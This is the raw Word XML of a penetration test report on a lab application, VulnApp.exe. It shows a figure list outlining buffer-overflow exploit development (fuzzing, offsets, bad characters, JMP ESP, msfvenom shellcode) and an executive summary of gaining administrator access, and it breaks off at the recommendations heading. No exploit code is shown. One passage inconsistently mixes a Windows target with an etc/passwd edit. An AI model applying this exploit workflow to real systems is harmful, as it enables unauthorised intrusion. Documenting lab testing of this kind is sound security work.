    <w:p w14:paraId="66CC5FFF" w14:textId="14BCB0DD" w:rsidR="008822EB" w:rsidRDefault="008822EB">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008822EB">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Figure 1.5: Register Values Inspection after VulnApp crash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:webHidden/>
        </w:rPr>
        <w:tab/>
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCE1698" w14:textId="387488F0" w:rsidR="008822EB" w:rsidRDefault="008822EB" w:rsidP="008822EB">
      <w:r>
        <w:t>Figure2.1: Generating The Pattern......................................................................................7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B61E5A" w14:textId="46C87BC5" w:rsidR="008822EB" w:rsidRDefault="008822EB" w:rsidP="008822EB">
      <w:r>
        <w:t>Figure2.2:Adding Generated Pattern To New Script..........................................................8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144103FE" w14:textId="3EB95387" w:rsidR="008822EB" w:rsidRDefault="008822EB" w:rsidP="008822EB">
      <w:r>
        <w:t>Figure2.3:</w:t>
      </w:r>
      <w:r w:rsidRPr="008822EB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>EAX,ESP and EIP values after running fuzzScript2.py</w:t>
      </w:r>
      <w:r>
        <w:t>.....................................8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316C5195" w14:textId="54DD5261" w:rsidR="008822EB" w:rsidRDefault="008822EB" w:rsidP="008822EB">
      <w:r w:rsidRPr="008822EB">
        <w:t>Figure 2.4: Identifying the Offset</w:t>
      </w:r>
      <w:r>
        <w:t>.....................................</w:t>
      </w:r>
      <w:r>
        <w:t>...................................................</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB06948" w14:textId="023A7E28" w:rsidR="008822EB" w:rsidRDefault="008822EB" w:rsidP="008822EB">
      <w:r>
        <w:t>Figure</w:t>
      </w:r>
      <w:r>
        <w:t>3.1</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="008822EB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A81AC6">
        <w:t>shellScript</w:t>
      </w:r>
      <w:r>
        <w:t>.py.....................................</w:t>
      </w:r>
      <w:r w:rsidR="00A81AC6">
        <w:t>.................................................................</w:t>
      </w:r>
      <w:r w:rsidR="00984B08">
        <w:t>9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C3D344" w14:textId="26A72861" w:rsidR="008822EB" w:rsidRDefault="008822EB" w:rsidP="008822EB">
      <w:r>
        <w:t>Figure</w:t>
      </w:r>
      <w:r>
        <w:t>3.2</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="008822EB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A81AC6">
        <w:t>Overwritten EIP Register On Immunity......................</w:t>
      </w:r>
      <w:r>
        <w:t>.....................................</w:t>
      </w:r>
      <w:r w:rsidR="00984B08">
        <w:t>9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8C7E98" w14:textId="00D4611D" w:rsidR="008822EB" w:rsidRDefault="008822EB" w:rsidP="008822EB">
      <w:r>
        <w:t>Figure</w:t>
      </w:r>
      <w:r>
        <w:t>4.1</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="008822EB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A81AC6" w:rsidRPr="00A81AC6">
        <w:t>shellScript2.py to find Bad Characters</w:t>
      </w:r>
      <w:r>
        <w:t>.....................................</w:t>
      </w:r>
      <w:r w:rsidR="00A81AC6">
        <w:t>........................</w:t>
      </w:r>
      <w:r w:rsidR="00984B08">
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE14B1C" w14:textId="346832E9" w:rsidR="008822EB" w:rsidRDefault="00A81AC6" w:rsidP="008822EB">
      <w:r w:rsidRPr="00A81AC6">
        <w:t>Figure 4.2: Hex dump after running bad character script with null byte include</w:t>
      </w:r>
      <w:r>
        <w:t>............</w:t>
      </w:r>
      <w:r w:rsidR="00984B08">
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400B4C5C" w14:textId="4DEE5694" w:rsidR="008822EB" w:rsidRDefault="00A81AC6" w:rsidP="008822EB">
      <w:r w:rsidRPr="00A81AC6">
        <w:t>Figure 4.3: Hex dump after running bad character script without null byte included</w:t>
      </w:r>
      <w:r>
        <w:t>.....</w:t>
      </w:r>
      <w:r w:rsidR="00984B08">
        <w:t>11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C63403" w14:textId="6ED47EA6" w:rsidR="008822EB" w:rsidRDefault="00A81AC6" w:rsidP="008822EB">
      <w:r w:rsidRPr="00A81AC6">
        <w:t>Figure 5.1: mona.py python script</w:t>
      </w:r>
      <w:r>
        <w:t>......................................................................................</w:t>
      </w:r>
      <w:r w:rsidR="00984B08">
        <w:t>11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B61A8CB" w14:textId="03B8119C" w:rsidR="00A81AC6" w:rsidRDefault="00A81AC6" w:rsidP="008822EB">
      <w:r w:rsidRPr="00A81AC6">
        <w:t>Figure 5.2: mona modules on Immunity Debugger showing DLL’s</w:t>
      </w:r>
      <w:r w:rsidR="00984B08">
        <w:t>.................................12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1B2B43" w14:textId="5E0B6A3A" w:rsidR="008822EB" w:rsidRDefault="00A81AC6" w:rsidP="008822EB">
      <w:r w:rsidRPr="00A81AC6">
        <w:t>Figure 5.3: Using nasm_shell to find opcode equivalent of JMP EST</w:t>
      </w:r>
      <w:r w:rsidR="00984B08">
        <w:t>.............................12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F45873" w14:textId="359CDE5D" w:rsidR="00A81AC6" w:rsidRDefault="00A81AC6" w:rsidP="008822EB">
      <w:r w:rsidRPr="00A81AC6">
        <w:t>Figure 5.4: Using mona commands to find Return Addresses.</w:t>
      </w:r>
      <w:r w:rsidR="00984B08">
        <w:t>........................................12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678A964C" w14:textId="6F1CCB69" w:rsidR="00A81AC6" w:rsidRDefault="00A81AC6" w:rsidP="008822EB">
      <w:r w:rsidRPr="00A81AC6">
        <w:t>Figure 5.5: shellScript3.py showing inserted JMP Code</w:t>
      </w:r>
      <w:r w:rsidR="00984B08">
        <w:t>...................................................13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A256BFE" w14:textId="3E05FC8D" w:rsidR="00A81AC6" w:rsidRDefault="00A81AC6" w:rsidP="008822EB">
      <w:r w:rsidRPr="00A81AC6">
        <w:t>Figure 5.6: Inserting Breakpoints Using Pointer</w:t>
      </w:r>
      <w:r w:rsidR="00984B08">
        <w:t>..............................................................13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D8B1A2" w14:textId="21DC9735" w:rsidR="00A81AC6" w:rsidRDefault="00A81AC6" w:rsidP="008822EB">
      <w:r w:rsidRPr="00A81AC6">
        <w:t>Figure 5.7: Immunity recording breakpoint at essfunc.625011AF</w:t>
      </w:r>
      <w:r w:rsidR="00984B08">
        <w:t>...................................13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07961639" w14:textId="3B466A2D" w:rsidR="008822EB" w:rsidRDefault="00A81AC6" w:rsidP="008822EB">
      <w:r w:rsidRPr="00A81AC6">
        <w:t>Figure 6.1: Script With generated msfvenom shell code for Root Access</w:t>
      </w:r>
      <w:r w:rsidR="00984B08">
        <w:t>........................14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CF3FC1" w14:textId="05E51BAF" w:rsidR="00A81AC6" w:rsidRDefault="00A81AC6" w:rsidP="008822EB">
      <w:r w:rsidRPr="00A81AC6">
        <w:t>Figure 6.2: Gaining Root Access</w:t>
      </w:r>
      <w:r w:rsidR="00984B08">
        <w:t>.......................................................................................14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42663BFF" w14:textId="77777777" w:rsidR="00A81AC6" w:rsidRPr="008822EB" w:rsidRDefault="00A81AC6" w:rsidP="008822EB"/>
    <w:p w14:paraId="3D76B72B" w14:textId="7D553C36" w:rsidR="00D00ED1" w:rsidRDefault="008822EB">
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B887196" w14:textId="7C7A6526" w:rsidR="00D00ED1" w:rsidRDefault="00D00ED1"/>
    <w:p w14:paraId="7E8764F4" w14:textId="2B38D21D" w:rsidR="00D00ED1" w:rsidRDefault="00D00ED1"/>
    <w:p w14:paraId="3DE1648C" w14:textId="0ADB29AD" w:rsidR="00D00ED1" w:rsidRDefault="00D00ED1"/>
    <w:p w14:paraId="14DA8B05" w14:textId="1F1408FF" w:rsidR="00D00ED1" w:rsidRDefault="00D00ED1"/>
    <w:p w14:paraId="5EA9F1BB" w14:textId="38AB7DA2" w:rsidR="00D00ED1" w:rsidRDefault="00D00ED1"/>
    <w:p w14:paraId="77EEEF57" w14:textId="77777777" w:rsidR="00984B08" w:rsidRDefault="00984B08" w:rsidP="00984B08">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:color w:val="E51D1B" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2184C224" w14:textId="4B7C3AF7" w:rsidR="00D00ED1" w:rsidRDefault="00D00ED1" w:rsidP="00984B08">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:color w:val="E51D1B" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5018">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:color w:val="E51D1B" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>EXECUTIVE SUMMARY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF84E47" w14:textId="77777777" w:rsidR="00AD5018" w:rsidRPr="00AD5018" w:rsidRDefault="00AD5018" w:rsidP="00D00ED1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:color w:val="E51D1B" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6063C3E2" w14:textId="65575A1A" w:rsidR="00AD5018" w:rsidRDefault="00CE0CFE" w:rsidP="00AD5018">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Akolade Adelaja </w:t>
      </w:r>
      <w:r w:rsidR="008579D6">
        <w:t xml:space="preserve">conducted a comprehensive security assessment of </w:t>
      </w:r>
      <w:r w:rsidR="00D5031E">
        <w:t xml:space="preserve">the VulnApp.exe application on the Windows 7 Lab VM </w:t>
      </w:r>
      <w:r w:rsidR="003A4D7B">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="00D5031E">
        <w:t xml:space="preserve"> determine its existing vulnerabilities by engaging in a penetration test that was conducted on the 14</w:t>
      </w:r>
      <w:r w:rsidR="00D5031E" w:rsidRPr="00D5031E">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="00D5031E">
        <w:t xml:space="preserve"> of February 2021. </w:t>
      </w:r>
      <w:r w:rsidR="00AD5018">
        <w:t xml:space="preserve">The goal of the “pentest” is to act as a malicious actor by performing attacks against the application with the </w:t>
      </w:r>
      <w:r w:rsidR="00296EBB">
        <w:t>aim of</w:t>
      </w:r>
      <w:r w:rsidR="00AD5018">
        <w:t xml:space="preserve"> discovering any vulnerabilities that could lead to a breach</w:t>
      </w:r>
      <w:r w:rsidR="002752F8">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00AD5018">
        <w:t xml:space="preserve"> and be leveraged to gain access to the </w:t>
      </w:r>
      <w:r w:rsidR="00A952F2">
        <w:t xml:space="preserve">system through the </w:t>
      </w:r>
      <w:r w:rsidR="00AD5018">
        <w:t>application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7D2972" w14:textId="77777777" w:rsidR="00AD5018" w:rsidRDefault="00AD5018" w:rsidP="00AD5018">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03C5509F" w14:textId="4328E255" w:rsidR="00296EBB" w:rsidRDefault="00D5031E" w:rsidP="00AD5018">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>This assessment harnessed testing</w:t>
      </w:r>
      <w:r w:rsidR="00AD5018">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> based on the </w:t>
      </w:r>
      <w:r w:rsidR="00AD5018" w:rsidRPr="00AD5018">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>NIST SP 800-115 Technical Guide to Information Security Testing and Assessment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:r w:rsidR="00AD5018" w:rsidRPr="00AD5018">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>OWASP Testing Guide (v4)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003A4D7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
        </w:rPr>
        <w:t>to provide documentation and proof</w:t>
      </w:r>
      <w:r w:rsidR="003A4D7B" w:rsidRPr="003A4D7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003A4D7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidR="003A4D7B" w:rsidRPr="003A4D7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
        </w:rPr>
        <w:t>developing a working exploit.</w:t>
      </w:r>
      <w:r w:rsidR="00AD5018" w:rsidRPr="00AD5018">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127FAABA" w14:textId="46C55EDD" w:rsidR="003A4D7B" w:rsidRDefault="003A4D7B" w:rsidP="00AD5018">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CD50E18" w14:textId="49568ADE" w:rsidR="003A4D7B" w:rsidRPr="003A4D7B" w:rsidRDefault="003A4D7B" w:rsidP="00AD5018">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
          <w:color w:val="E51D1B" w:themeColor="accent4" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A4D7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
          <w:color w:val="E51D1B" w:themeColor="accent4" w:themeShade="BF"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
          <w:color w:val="E51D1B" w:themeColor="accent4" w:themeShade="BF"/>
        </w:rPr>
        <w:t>HASES OF PENETRATION TEST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFD27F6" w14:textId="77777777" w:rsidR="003A4D7B" w:rsidRPr="003A4D7B" w:rsidRDefault="003A4D7B" w:rsidP="003A4D7B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A4D7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
        </w:rPr>
        <w:t>Phases of penetration testing activities include the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F2F8D5" w14:textId="2903ABA0" w:rsidR="003A4D7B" w:rsidRPr="003A4D7B" w:rsidRDefault="003A4D7B" w:rsidP="003A4D7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A4D7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
        </w:rPr>
        <w:t>Planning –</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> G</w:t>
      </w:r>
      <w:r w:rsidRPr="003A4D7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
        </w:rPr>
        <w:t>oals are gathered, and rules of engagement obtained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6440F5DE" w14:textId="77777777" w:rsidR="003A4D7B" w:rsidRPr="003A4D7B" w:rsidRDefault="003A4D7B" w:rsidP="003A4D7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A4D7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
        </w:rPr>
        <w:t>Discovery – Perform scanning and enumeration to identify potential vulnerabilities, weak areas, and exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B253478" w14:textId="0CDBEED9" w:rsidR="003A4D7B" w:rsidRDefault="003A4D7B" w:rsidP="003A4D7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A4D7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
        </w:rPr>
        <w:t>Attack – Confirm potential vulnerabilities through exploitation and perform additional discovery upon new access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2078E4" w14:textId="75C595C3" w:rsidR="003A4D7B" w:rsidRPr="003A4D7B" w:rsidRDefault="003A4D7B" w:rsidP="003A4D7B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A4D7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Reporting – Document all found vulnerabilities and exploits, failed </w:t>
      </w:r>
      <w:r w:rsidR="00FB7D7B" w:rsidRPr="003A4D7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
        </w:rPr>
        <w:t>attempts,</w:t>
      </w:r>
      <w:r w:rsidR="00C10754">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and recommendation</w:t>
      </w:r>
      <w:r w:rsidR="00FB7D7B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00C10754">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C66A683" w14:textId="1F454814" w:rsidR="003A4D7B" w:rsidRDefault="003A4D7B" w:rsidP="003A4D7B">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FEAF591" w14:textId="1AA59D50" w:rsidR="003A4D7B" w:rsidRDefault="00A66D47" w:rsidP="003A4D7B">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A66D47">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:iCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E90D5A3" wp14:editId="1C6A9CA4">
            <wp:extent cx="5162550" cy="2314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3273" cy="2314899"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="706CCBF2" w14:textId="77777777" w:rsidR="00A952F2" w:rsidRPr="00A952F2" w:rsidRDefault="00A952F2" w:rsidP="00AD5018">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A952F2">
        <w:rPr>
          <w:color w:val="E51D1B" w:themeColor="accent4" w:themeShade="BF"/>
        </w:rPr>
        <w:t>FINDINGS OVERVIEW</w:t>
      </w:r>
      <w:r w:rsidRPr="00A952F2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED7A9FA" w14:textId="0C3F5FAF" w:rsidR="00A66D47" w:rsidRDefault="00A952F2" w:rsidP="00AD5018">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>While conducting the</w:t>
      </w:r>
      <w:r w:rsidR="00A66D47">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>penetration test, there was one critical vulnerability discovered in</w:t>
      </w:r>
      <w:r w:rsidR="00A66D47">
        <w:t xml:space="preserve"> the system</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Adelaja was able to gain </w:t>
      </w:r>
      <w:r w:rsidR="00A66D47">
        <w:t>root access</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A66D47">
        <w:t>and connect to the windows machine</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A66D47">
        <w:t>as an administrator</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. This was possible due to a vulnerable </w:t>
      </w:r>
      <w:r w:rsidR="00A66D47">
        <w:t>program being executed as an administrator</w:t>
      </w:r>
      <w:r>
        <w:t>, which led to remote system access</w:t>
      </w:r>
      <w:r w:rsidR="00A66D47">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76467AE9" w14:textId="77777777" w:rsidR="00CA57FA" w:rsidRDefault="00CA57FA" w:rsidP="00AD5018">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0632D670" w14:textId="77777777" w:rsidR="00A66D47" w:rsidRDefault="00A952F2" w:rsidP="00AD5018">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A brief technical overview is listed below: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA6CA13" w14:textId="160C7228" w:rsidR="00A952F2" w:rsidRDefault="00A952F2" w:rsidP="00AD5018">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00630312">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Target: </w:t>
      </w:r>
      <w:r w:rsidR="00A66D47" w:rsidRPr="00630312">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>VulnApp.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Low-privilege shell was obtained by performing a </w:t>
      </w:r>
      <w:r w:rsidR="00A66D47">
        <w:t>Buffer-Overflow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> attack against </w:t>
      </w:r>
      <w:r w:rsidR="008B6D5B">
        <w:t xml:space="preserve">the application </w:t>
      </w:r>
      <w:r w:rsidR="00F80137">
        <w:t>found open on port 9999</w:t>
      </w:r>
      <w:r w:rsidR="009E3B7D">
        <w:t xml:space="preserve"> g</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ranting </w:t>
      </w:r>
      <w:r w:rsidR="00630312">
        <w:t xml:space="preserve">Adelaja </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E3B7D">
        <w:t>full root/administrative privileges</w:t>
      </w:r>
      <w:r w:rsidR="00153167">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F80137">
        <w:t xml:space="preserve"> Once access was established, privilege escalation was possible due to the write permissions of </w:t>
      </w:r>
      <w:r w:rsidR="00F80137" w:rsidRPr="00F80137">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>‘lab’</w:t>
      </w:r>
      <w:r w:rsidR="00F80137">
        <w:t xml:space="preserve">; which allowed the creation of a new admin </w:t>
      </w:r>
      <w:r w:rsidR="00F80137" w:rsidRPr="00F80137">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">‘lab2’ </w:t>
      </w:r>
      <w:r w:rsidR="00F80137">
        <w:t>to the etc/passwd file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1069BFAD" w14:textId="43EAFBFB" w:rsidR="00153167" w:rsidRDefault="00153167" w:rsidP="00AD5018">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28D1A580" w14:textId="0DC6E6C3" w:rsidR="00153167" w:rsidRDefault="00153167" w:rsidP="00AD5018">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="228F705A" w14:textId="73D5F84C" w:rsidR="00153167" w:rsidRDefault="00153167" w:rsidP="00AD5018">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72A36003" w14:textId="00A73C38" w:rsidR="00153167" w:rsidRDefault="00153167" w:rsidP="00AD5018">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="334CC024" w14:textId="77777777" w:rsidR="00153167" w:rsidRPr="00153167" w:rsidRDefault="00153167" w:rsidP="00AD5018">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="E51D1B" w:themeColor="accent4" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00153167">
        <w:rPr>
          <w:color w:val="E51D1B" w:themeColor="accent4" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">RECOMMENDATIONS </w:t>
